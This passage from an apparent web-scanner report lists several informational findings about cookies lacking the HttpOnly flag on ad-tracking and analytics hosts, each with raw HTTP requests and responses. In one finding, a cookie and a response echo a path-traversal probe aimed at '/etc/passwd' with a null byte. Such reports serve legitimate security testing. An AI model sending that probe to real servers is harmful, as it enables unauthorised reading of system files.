Referer: http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=http://clk.atdmt.com/go/335787632/direct;wi.728;hi.90;ai.236941493;ct.1/01
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.3
Set-Cookie: origin=20State_49PromoOffer; expires=Mon, 17-Oct-2011 01:38:39 GMT; path=/; domain=attuvereseoffers.com
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:38:39 GMT
Content-Length: 19572


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

12.70. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2101&c3=1234567891234567891&ns__t=1316220475506&ns_c=ISO-8859-1&c8=&c7=http%3A%2F%2Fdg.specificclick.net%2F%3Fy%3D3%26t%3Dh%26u%3Dhttp%253A%252F%252Fwww.actvalue.com%252F%26r%3Dhttp%253A%252F%252Fwww.radius-server.net%252Faradial-radius-server-billing-partners-inner.html&c9=http%3A%2F%2Fwww.actvalue.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://dg.specificclick.net/?y=3&t=h&u=http%3A%2F%2Fwww.actvalue.com%2F&r=http%3A%2F%2Fwww.radius-server.net%2Faradial-radius-server-billing-partners-inner.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 16 Sep 2011 19:47:00 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Sun, 15-Sep-2013 19:47:00 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate


12.71. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=1&c2=7395021&c3=&c4=&c5=01&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 17 Sep 2011 01:00:31 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 16-Sep-2013 01:00:31 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

12.72. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3005004&d.c=gif&d.o=wdgabccom&d.x=83677928&d.t=page&d.u=http%3A%2F%2Fbeta.abc.go.com%2Fshows%2Fcharlies-angels%2Fbios&d.r=http%3A%2F%2Fbeta.abc.go.com%2Fshows%2Fcharlies-angels HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 17 Sep 2011 00:58:02 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 16-Sep-2013 00:58:02 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

12.73. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p63514475&c3=348445181&c4=233006068&c5=1&c6=1&c7=Sat%20Sep%2017%2000%3A53%3A01%202011&c8=http%3A%2F%2Fomg.yahoo.com%2Fxhr%2Fad%2FLREC%2F2115823648%3Fref%3DaHR0cDovL3d3dy55YWhvby5jb20v%26token%3Db475da4881df940801d7698aa9d116ab&c9=&c10=http%3A%2F%2Fomg.yahoo.com%2Fphotos%2Fwhat-were-they-thinking%2F5203&c15=&1316238866586 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_G=method->-1,ts->1316220781; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 17 Sep 2011 00:54:32 GMT
Connection: close
Set-Cookie: UID=9cc29993-80.67.74.150-1314836282; expires=Mon, 16-Sep-2013 00:54:32 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate


12.74. http://b.voicefive.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=4&c2=p109848095&c3=70982068&c4=43901049&c5=&c6=1&c7=Sat%20Sep%2017%2000%3A57%3A53%202011&c8=&c9=&c10=&c15=&rn=1316221073 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 17 Sep 2011 01:05:33 GMT
Connection: close
Set-Cookie: UID=9cc29993-80.67.74.150-1314836282; expires=Mon, 16-Sep-2013 01:05:33 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

12.75. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223.1071929@2@223.3078101@1@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82

<!-- gd1183.adx.ne1.yahoo.com compressed/chunked Sat Sep 17 00:52:10 UTC 2011 -->

12.76. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82

<!-- gd1191.adx.ne1.yahoo.com compressed/chunked Sat Sep 17 00:53:35 UTC 2011 -->

12.77. http://bostonheraldnie.newspaperdirect.com/epaper/viewer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/viewer.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /epaper/viewer.aspx HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/national/?type=rem911
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: psid=283490193; expires=Tue, 17-Sep-2041 01:38:54 GMT; path=/epaper/
wc: 1
Date: Sat, 17 Sep 2011 01:38:54 GMT
Content-Length: 22628


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><script type="text/javascript">
window.NDScriptsVers
...[SNIP]...

12.78. http://c.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=5999220&resolution=1920&h=1200&camefrom=http%3A//bgs-soft.com/Products_Sgagent.html&u=http%3A//bgs-soft.com/Products_Sgagent.asp&t=SG.Agent%20Database%20Monitor&java=1&security=6b0a452a&sc_random=0.8136778890620917&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://bgs-soft.com/Products_Sgagent.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0-1345764.1315835096.1-2145838.1315843624.0-3505602.1315879313.0

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:47:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0-1345764.1315835096.1-2145838.1315843624.0-3505602.1315879313.0-5999220.1316202439.0; expires=Wed, 14-Sep-2016 19:47:19 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

12.79. http://cdnt.meteorsolutions.com/api/setid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/setid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/setid?parent_fbid=&application_id=ee612e29-9b27-4ec8-bbf8-759478dd3755&url_fbid=9Lm6uVSxV_u HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Date: Sat, 17 Sep 2011 01:39:53 GMT
Etag: "2daeaa8b5f19f0bc209d976c02bd6acb51b00b0a"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Set-Cookie: uid=c5699614-96b6-4b6d-81ac-02170daae0a633b7e2913d8ce97675309ce5; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:39:53 GMT; Path=/
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

12.80. http://cdnt.meteorsolutions.com/api/track  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/track

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/track?application_id=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3&url_fbid=1gfCnkBxeSl&parent_fbid=4pj9azku6R1&referrer=http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u&location=http%3A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%23fbid%3D4pj9azku6R1%3Fsource%3DECbc0000000WIP00O&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:52:37 GMT
Etag: "a7c223fab197a8333376f0f20e193cc77bbd9719"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Set-Cookie: meteor_server_49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3%3C%3E1gfCnkBxeSl%3C%3E4pj9azku6R1%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u%3C%3Ehttp%253A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%2523fbid%253D4pj9azku6R1%253Fsource%253DECbc0000000WIP00O; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:52:37 GMT; Path=/
Set-Cookie: uid=c5699614-96b6-4b6d-81ac-02170daae0a6../../../../../../../../etc/passwd%00c5699614-96b6-4b6d-81ac-02170daae0a6; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:52:37 GMT; Path=/
Content-Length: 271
Connection: keep-alive

meteor.json_query_callback({"parent_id": "4pj9azku6R1", "id": "1gfCnkBxeSl", "uid": "c5699614\\x2D96b6\\x2D4b6d\\x2D81ac\\x2D02170daae0a6..\\x2F..\\x2F..\\x2F..\\x2F..\\x2F..\\x2F..\\x2F..\\x2Fetc\\x2
...[SNIP]...

12.81. http://cdnt.meteorsolutions.com/api/track  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/track

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

